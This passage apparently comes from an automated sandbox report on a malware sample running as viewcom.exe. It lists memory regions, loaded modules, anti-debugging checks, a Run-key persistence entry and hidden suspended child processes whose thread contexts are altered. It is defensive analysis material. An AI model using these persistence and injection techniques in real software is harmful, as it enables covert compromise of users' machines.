rpcrt4.dll	0x75b60000	0x75c00fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
user32.dll	0x75c10000	0x75cd8fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
urlmon.dll	0x75ce0000	0x75e15fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
iertutil.dll	0x75e30000	0x7602afff	Memory Mapped File	Readable, Writable, Executable	Region Actions
advapi32.dll	0x76030000	0x760cffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
shlwapi.dll	0x760e0000	0x76136fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
sechost.dll	0x76330000	0x76348fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernel32.dll	0x76350000	0x76423fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
imm32.dll	0x77140000	0x7715efff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wininet.dll	0x771e0000	0x772d4fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msctf.dll	0x772e0000	0x773abfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msvcrt.dll	0x773b0000	0x7745bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ole32.dll	0x77460000	0x775bbfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ntdll.dll	0x775c0000	0x776fbfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
gdi32.dll	0x77710000	0x7775dfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
oleaut32.dll	0x77760000	0x777eefff	Memory Mapped File	Readable, Writable, Executable	Region Actions
apisetschema.dll	0x77800000	0x77800fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
pagefile_0x000000007f6f0000	0x7f6f0000	0x7f7effff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x000000007ffb0000	0x7ffb0000	0x7ffd2fff	Pagefile Backed Memory	Readable	Region Actions
private_0x000000007ffdd000	0x7ffdd000	0x7ffddfff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000007ffde000	0x7ffde000	0x7ffdefff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000007ffdf000	0x7ffdf000	0x7ffdffff	Private Memory	Readable, Writable	Region Actions Download Dump

Host Behavior

File (2)

Operation	Filename	Additional Information	Success	Count	Logfile
Create	C:\email.doc	desired_access = GENERIC_READ		1	Fn
Create	C:\a\foobar.bmp	desired_access = GENERIC_READ		1	Fn

Process (1)

Operation	Process	Additional Information	Success	Count	Logfile
Create	C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.exe	os_pid = 0xb98, startup_flags = STARTF_FORCEOFFFEEDBACK, show_window = SW_HIDE		1	Fn

Module (56)

Operation	Module	Additional Information	Count	Logfile
Load	ntdll.dll	base_address = 0x775c0000	1	Fn
Load	KERNEL32.dll	base_address = 0x76350000	2	Fn
Load	ADVAPI32.dll	base_address = 0x76030000	1	Fn
Load	SHLWAPI.dll	base_address = 0x760e0000	1	Fn
Load	winhttp.dll	base_address = 0x6f600000	7	Fn
Load	urlmon.dll	base_address = 0x75ce0000	7	Fn
Load	wininet.dll	base_address = 0x771e0000	7	Fn
Get Handle	c:\users\atveyd~1\appdata\local\temp\38763.exe	base_address = 0x400000	1	Fn
Get Filename	c:\users\atveyd~1\appdata\local\temp\38763.exe	process_name = c:\users\atveydl98z\appdata\local\microsoft\windows\viewcom.exe, file_name_orig = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.exe, size = 259	1	Fn
Get Filename		process_name = c:\users\atveydl98z\appdata\local\microsoft\windows\viewcom.exe, file_name_orig = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.exe, size = 260	1	Fn
Get Address		function = VirtualAlloc, ordinal = 0, address_out = 0x12fd10	1	Fn
Get Address		function = VirtualAlloc, ordinal = 0, address_out = 0x12fd50	1	Fn
Get Address		function = LoadLibraryA, ordinal = 0, address_out = 0x12fd6c	1	Fn
Get Address		function = GetProcAddress, ordinal = 0, address_out = 0x12fd6c	1	Fn
Get Address		function = VirtualAlloc, ordinal = 0, address_out = 0x12fd6c	1	Fn
Get Address		function = VirtualProtect, ordinal = 0, address_out = 0x12fd6c	1	Fn
Get Address		function = UnmapViewOfFile, ordinal = 0, address_out = 0x12fd6c	1	Fn
Get Address		function = AddVectoredExceptionHandler, ordinal = 0, address_out = 0x12fd6c	1	Fn
Get Address		function = RemoveVectoredExceptionHandler, ordinal = 0, address_out = 0x12fd6c	1	Fn
Get Address	c:\windows\system32\ntdll.dll	function = cos, address_out = 0x77607400	1	Fn
Get Address	c:\windows\system32\ntdll.dll	function = sin, address_out = 0x775f41c0	1	Fn
Get Address	c:\windows\system32\ntdll.dll	function = strchr, address_out = 0x77607690	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = LoadLibraryA, address_out = 0x763a395c	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = lstrcmpA, address_out = 0x76388c59	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = CreateFileA, address_out = 0x7639cee8	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = CloseHandle, address_out = 0x7639ca7c	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetModuleHandleA, address_out = 0x7639cf41	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetModuleFileNameA, address_out = 0x763a33f6	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetComputerNameA, address_out = 0x76386ba9	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetComputerNameExA, address_out = 0x763df41f	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetCommandLineA, address_out = 0x763a98ff	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = FreeConsole, address_out = 0x763fbfde	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = VirtualAlloc, address_out = 0x763a2fb6	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = IsDebuggerPresent, address_out = 0x76393ea8	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetUserNameA, address_out = 0x7605a4b4	1	Fn
Get Address	c:\windows\system32\shlwapi.dll	function = StrStrIA, address_out = 0x760ed250	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = WTSGetActiveConsoleSessionId, address_out = 0x7638480b	1	Fn

System (2)

Operation	Additional Information	Success	Count	Logfile
Get Computer Name	result_out = ZJEWV7F		1	Fn
Get Computer Name	result_out = ZjEwV7f, type = ComputerNameDnsHostname		1	Fn

Mutex (1)

Operation	Additional Information	Success	Count	Logfile
Create	mutex_name = M68B1B0D0		1	Fn

Debug (498)

Operation	Process	Additional Information	Success	Count	Logfile
Check for Presence	c:\users\atveydl98z\appdata\local\microsoft\windows\viewcom.exe			498	Fn

Process #6: viewcom.exe

(Host: 670, Network: 33)

Information	Value
ID	#6
File Name	c:\users\atveydl98z\appdata\local\microsoft\windows\viewcom.exe
Command Line	"C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.exe"
Initial Working Directory	C:\Users\ATVeyDl98Z\Desktop\
Monitor	Start Time: 00:01:04, Reason: Child Process
Unmonitor	End Time: 00:02:34, Reason: Terminated by Timeout
Monitor Duration	00:01:30

OS Process Information

Information	Value
PID	0xb98
Parent PID	0xb8c (c:\users\atveydl98z\appdata\local\microsoft\windows\viewcom.exe)
Is Created or Modified Executable
Integrity Level	Medium
Username	ZJEWV7F\ATVeyDl98Z
Groups	ZJEWV7F\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) BUILTIN\Administrators (USE_FOR_DENY_ONLY) BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Logon Session 00000000:0000f73d (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID) LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x B9C 0x BA0 0x BAC 0x BB0 0x BB4 0x C48 0x C4C 0x C50 0x C54 0x C58 0x C5C 0x C60 0x C64 0x C68 0x C6C 0x C88 0x C8C

Region

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x0002ffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	Readable, Writable	Region Actions
private_0x0000000000020000	0x00020000	0x00020fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000000030000	0x00030000	0x0012ffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000000000130000	0x00130000	0x00133fff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000000140000	0x00140000	0x00140fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000000150000	0x00150000	0x0015dfff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000000160000	0x00160000	0x0016cfff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
private_0x0000000000170000	0x00170000	0x0017cfff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000000180000	0x00180000	0x0027ffff	Private Memory	Readable, Writable	Region Actions Download Dump
locale.nls	0x00280000	0x002e6fff	Memory Mapped File	Readable	Region Actions
pagefile_0x00000000002f0000	0x002f0000	0x002f0fff	Pagefile Backed Memory	Readable, Writable	Region Actions
pagefile_0x0000000000300000	0x00300000	0x00314fff	Pagefile Backed Memory	Readable	Region Actions
rsaenh.dll	0x00300000	0x0033bfff	Memory Mapped File	Readable	Region Actions
private_0x0000000000300000	0x00300000	0x0030ffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000000000300000	0x00300000	0x00307fff	Pagefile Backed Memory	Readable, Writable	Region Actions
pagefile_0x0000000000300000	0x00300000	0x00301fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000310000	0x00310000	0x00317fff	Pagefile Backed Memory	Readable, Writable	Region Actions
windowsshell.manifest	0x00310000	0x00310fff	Memory Mapped File	Readable	Region Actions
index.dat	0x00310000	0x0031ffff	Memory Mapped File	Readable, Writable	Region Actions
pagefile_0x0000000000320000	0x00320000	0x00321fff	Pagefile Backed Memory	Readable	Region Actions
index.dat	0x00330000	0x00337fff	Memory Mapped File	Readable, Writable	Region Actions
private_0x0000000000340000	0x00340000	0x0034ffff	Private Memory	Readable, Writable	Region Actions Download Dump
index.dat	0x00350000	0x0035ffff	Memory Mapped File	Readable, Writable	Region Actions
private_0x0000000000360000	0x00360000	0x003bffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000000360000	0x00360000	0x00360fff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000000000360000	0x00360000	0x00360fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000370000	0x00370000	0x00370fff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000000380000	0x00380000	0x003bffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x00000000003c0000	0x003c0000	0x003c0fff	Pagefile Backed Memory	Readable	Region Actions
private_0x00000000003d0000	0x003d0000	0x003f3fff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
38763.exe	0x00400000	0x00415fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
pagefile_0x0000000000420000	0x00420000	0x004e7fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x00000000004f0000	0x004f0000	0x005f0fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000600000	0x00600000	0x011fffff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000001200000	0x01200000	0x012fffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000001300000	0x01300000	0x01305fff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
private_0x0000000001310000	0x01310000	0x0134ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000001350000	0x01350000	0x0135ffff	Private Memory	Readable, Writable	Region Actions Download Dump
sortdefault.nls	0x01360000	0x0162efff	Memory Mapped File	Readable	Region Actions
private_0x0000000001630000	0x01630000	0x0172ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000001730000	0x01730000	0x0182ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000001830000	0x01830000	0x0192ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000001930000	0x01930000	0x01a2ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000001a30000	0x01a30000	0x01c2ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000001a30000	0x01a30000	0x01acffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000001a30000	0x01a30000	0x01a90fff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
private_0x0000000001aa0000	0x01aa0000	0x01abdfff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
private_0x0000000001ac0000	0x01ac0000	0x01acffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000001ad0000	0x01ad0000	0x01baffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000001ad0000	0x01ad0000	0x01b6efff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000001ba0000	0x01ba0000	0x01baffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000001bf0000	0x01bf0000	0x01c2ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000001c30000	0x01c30000	0x01dbffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000001c30000	0x01c30000	0x01d2ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000001dc0000	0x01dc0000	0x01ebffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000001ec0000	0x01ec0000	0x01fbffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000001fc0000	0x01fc0000	0x020bffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x00000000020c0000	0x020c0000	0x021bffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x00000000021c0000	0x021c0000	0x022bffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x00000000022c0000	0x022c0000	0x023bffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x00000000023c0000	0x023c0000	0x024bffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x00000000024c0000	0x024c0000	0x025bffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x00000000025c0000	0x025c0000	0x026bffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x00000000026c0000	0x026c0000	0x027bffff	Private Memory	Readable, Writable	Region Actions Download Dump
npmproxy.dll	0x6c840000	0x6c847fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
winspool.drv	0x6d400000	0x6d450fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
rasadhlp.dll	0x6da20000	0x6da25fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
webio.dll	0x6f5b0000	0x6f5fefff	Memory Mapped File	Readable, Writable, Executable	Region Actions
winhttp.dll	0x6f600000	0x6f657fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
netprofm.dll	0x6fbf0000	0x6fc49fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
mpr.dll	0x70f40000	0x70f51fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
sensapi.dll	0x72470000	0x72475fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
rasman.dll	0x72fb0000	0x72fc4fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
rasapi32.dll	0x72fd0000	0x73021fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
rtutils.dll	0x736d0000	0x736dcfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
samcli.dll	0x73800000	0x7380efff	Memory Mapped File	Readable, Writable, Executable	Region Actions
winrnr.dll	0x73850000	0x73857fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
pnrpnsp.dll	0x73860000	0x73871fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
napinsp.dll	0x73880000	0x7388ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wkscli.dll	0x73e90000	0x73e9efff	Memory Mapped File	Readable, Writable, Executable	Region Actions
netutils.dll	0x73ea0000	0x73ea8fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
netapi32.dll	0x73eb0000	0x73ec0fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
dhcpcsvc.dll	0x73fa0000	0x73fb1fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
dhcpcsvc6.dll	0x73fc0000	0x73fccfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
fwpuclnt.dll	0x73fe0000	0x74017fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
winnsi.dll	0x740f0000	0x740f6fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
iphlpapi.dll	0x74100000	0x7411bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wtsapi32.dll	0x741a0000	0x741acfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
nlaapi.dll	0x74230000	0x7423ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ntmarta.dll	0x74460000	0x74480fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
comctl32.dll	0x746f0000	0x7488dfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wshtcpip.dll	0x74cf0000	0x74cf4fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
userenv.dll	0x74dc0000	0x74dd6fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
rsaenh.dll	0x74f80000	0x74fbafff	Memory Mapped File	Readable, Writable, Executable	Region Actions
dnsapi.dll	0x75060000	0x750a3fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wship6.dll	0x75190000	0x75195fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
mswsock.dll	0x751a0000	0x751dbfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
cryptsp.dll	0x751e0000	0x751f5fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
srvcli.dll	0x755b0000	0x755c8fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
sspicli.dll	0x75640000	0x7565afff	Memory Mapped File	Readable, Writable, Executable	Region Actions
cryptbase.dll	0x75660000	0x7566bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
rpcrtremote.dll	0x75700000	0x7570dfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
profapi.dll	0x75710000	0x7571afff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msasn1.dll	0x75780000	0x7578bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
crypt32.dll	0x757b0000	0x758ccfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernelbase.dll	0x758d0000	0x75919fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
usp10.dll	0x75a70000	0x75b0cfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
lpk.dll	0x75b10000	0x75b19fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ws2_32.dll	0x75b20000	0x75b54fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
rpcrt4.dll	0x75b60000	0x75c00fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
user32.dll	0x75c10000	0x75cd8fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
urlmon.dll	0x75ce0000	0x75e15fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
nsi.dll	0x75e20000	0x75e25fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
iertutil.dll	0x75e30000	0x7602afff	Memory Mapped File	Readable, Writable, Executable	Region Actions
advapi32.dll	0x76030000	0x760cffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
shlwapi.dll	0x760e0000	0x76136fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wldap32.dll	0x76140000	0x76184fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
sechost.dll	0x76330000	0x76348fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernel32.dll	0x76350000	0x76423fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
clbcatq.dll	0x76460000	0x764e2fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
shell32.dll	0x764f0000	0x77139fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
imm32.dll	0x77140000	0x7715efff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wininet.dll	0x771e0000	0x772d4fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msctf.dll	0x772e0000	0x773abfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msvcrt.dll	0x773b0000	0x7745bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ole32.dll	0x77460000	0x775bbfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ntdll.dll	0x775c0000	0x776fbfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
normaliz.dll	0x77700000	0x77702fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
gdi32.dll	0x77710000	0x7775dfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
oleaut32.dll	0x77760000	0x777eefff	Memory Mapped File	Readable, Writable, Executable	Region Actions
apisetschema.dll	0x77800000	0x77800fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
pagefile_0x000000007f6f0000	0x7f6f0000	0x7f7effff	Pagefile Backed Memory	Readable	Region Actions
private_0x000000007ffad000	0x7ffad000	0x7ffadfff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000007ffae000	0x7ffae000	0x7ffaefff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000007ffaf000	0x7ffaf000	0x7ffaffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x000000007ffb0000	0x7ffb0000	0x7ffd2fff	Pagefile Backed Memory	Readable	Region Actions
private_0x000000007ffd3000	0x7ffd3000	0x7ffd3fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000007ffd4000	0x7ffd4000	0x7ffd4fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000007ffd5000	0x7ffd5000	0x7ffd5fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000007ffd6000	0x7ffd6000	0x7ffd6fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000007ffd7000	0x7ffd7000	0x7ffd7fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000007ffd8000	0x7ffd8000	0x7ffd8fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000007ffd9000	0x7ffd9000	0x7ffd9fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000007ffda000	0x7ffda000	0x7ffdafff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000007ffdb000	0x7ffdb000	0x7ffdbfff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000007ffdc000	0x7ffdc000	0x7ffdcfff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000007ffdd000	0x7ffdd000	0x7ffddfff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000007ffde000	0x7ffde000	0x7ffdefff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000007ffdf000	0x7ffdf000	0x7ffdffff	Private Memory	Readable, Writable	Region Actions Download Dump
For performance reasons, the remaining 19 entries are omitted. The remaining entries can be found in flog.txt.

Created Files

Filename	File Size	Hash Values	Actions
c:\programdata\9f1b.tmp	0.00 KB (0 bytes)	MD5: d41d8cd98f00b204e9800998ecf8427e SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855	File Actions Show Properties
c:\programdata\9f1c.tmp	0.00 KB (0 bytes)	MD5: d41d8cd98f00b204e9800998ecf8427e SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855	File Actions Show Properties
c:\programdata\9f2d.tmp	0.00 KB (0 bytes)	MD5: d41d8cd98f00b204e9800998ecf8427e SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855	File Actions Show Properties
c:\programdata\9f1c.tmp	0.11 KB (112 bytes)	MD5: 36427ecb2a0faf13af3047c51b29f9c5 SHA1: 9a3fb26927a7aa81255cf8abcc1f1c3e38f28c4f SHA256: ea156f649bb1180b32c6d5be76c0969941ec76d1fface734f401b5327ac57345	File Actions Show Properties Download
c:\programdata\9f1b.tmp	0.08 KB (84 bytes)	MD5: fdf031de948302c61dede50cd61fa096 SHA1: d926af57565c1448dd81009ed90e324575e9b481 SHA256: 370497cb330134ed7954bbedd18db1a0b34a85bc821b857624183a8d139b95d5	File Actions Show Properties Download

Host Behavior

File (18)

Operation	Filename	Additional Information	Count	Logfile
Create	C:\email.doc	desired_access = GENERIC_READ	1	Fn
Create	C:\a\foobar.bmp	desired_access = GENERIC_READ	1	Fn
Create	C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.exe	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\ProgramData\9F1C.tmp	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\ProgramData\9F1B.tmp	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\ProgramData\9F2D.tmp	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ	1	Fn
Create Temp File	C:\ProgramData\9F1B.tmp	path = C:\ProgramData	1	Fn
Create Temp File	C:\ProgramData\9F1C.tmp	path = C:\ProgramData	1	Fn
Create Temp File	C:\ProgramData\9F2D.tmp	path = C:\ProgramData	1	Fn
Get Info	C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.exe	type = size	1	Fn
Get Info	C:\ProgramData\9F1C.tmp	type = size	1	Fn
Get Info	C:\ProgramData\9F1B.tmp	type = size	1	Fn
Delete	C:\ProgramData\9F1B.tmp		2	Fn
Delete	C:\ProgramData\9F1C.tmp		2	Fn
Delete	C:\ProgramData\9F2D.tmp		1	Fn
Delete	C:\ProgramData\9F2D.tmp		1	Fn

Registry (4)

Operation	Key	Additional Information	Count	Logfile
Create Key	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run		1	Fn
Create Key	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run		1	Fn
Write Value	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	value_name = viewcom, data = "C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.exe", size = 132, type = REG_SZ	1	Fn
Write Value	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	value_name = viewcom, data = "C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.exe", size = 132, type = REG_SZ	1	Fn

Process (3)

Operation	Process	Additional Information	Count	Logfile
Create	"C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.exe" /scomma "C:\ProgramData\9F1B.tmp"	os_pid = 0xc70, creation_flags = CREATE_SUSPENDED, show_window = SW_HIDE	1	Fn
Create	"C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.exe" /scomma "C:\ProgramData\9F1C.tmp"	os_pid = 0xc78, creation_flags = CREATE_SUSPENDED, show_window = SW_HIDE	1	Fn
Create	"C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.exe" "C:\ProgramData\9F2D.tmp"	os_pid = 0xc80, creation_flags = CREATE_SUSPENDED, show_window = SW_HIDE	1	Fn

Thread (9)

Operation	Process	Additional Information	Count	Logfile
Get Context	c:\users\atveydl98z\appdata\local\microsoft\windows\viewcom.exe	os_tid = 0xc48	1	Fn
Get Context	c:\users\atveydl98z\appdata\local\microsoft\windows\viewcom.exe	os_tid = 0xc58	1	Fn
Get Context	c:\users\atveydl98z\appdata\local\microsoft\windows\viewcom.exe	os_tid = 0xbb0	1	Fn
Set Context	c:\users\atveydl98z\appdata\local\microsoft\windows\viewcom.exe	os_tid = 0xc48	1	Fn
Set Context	c:\users\atveydl98z\appdata\local\microsoft\windows\viewcom.exe	os_tid = 0xc58	1	Fn
Set Context	c:\users\atveydl98z\appdata\local\microsoft\windows\viewcom.exe	os_tid = 0xbb0	1	Fn
Resume	c:\users\atveydl98z\appdata\local\microsoft\windows\viewcom.exe	os_tid = 0xc48	1	Fn
Resume	c:\users\atveydl98z\appdata\local\microsoft\windows\viewcom.exe	os_tid = 0xc58	1	Fn
Resume	c:\users\atveydl98z\appdata\local\microsoft\windows\viewcom.exe	os_tid = 0xbb0	1	Fn

Memory (15)

Operation	Process	Additional Information	Count	Logfile
Allocate	"C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.exe" /scomma "C:\ProgramData\9F1B.tmp"	address = 0x400000, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 114688	1	Fn
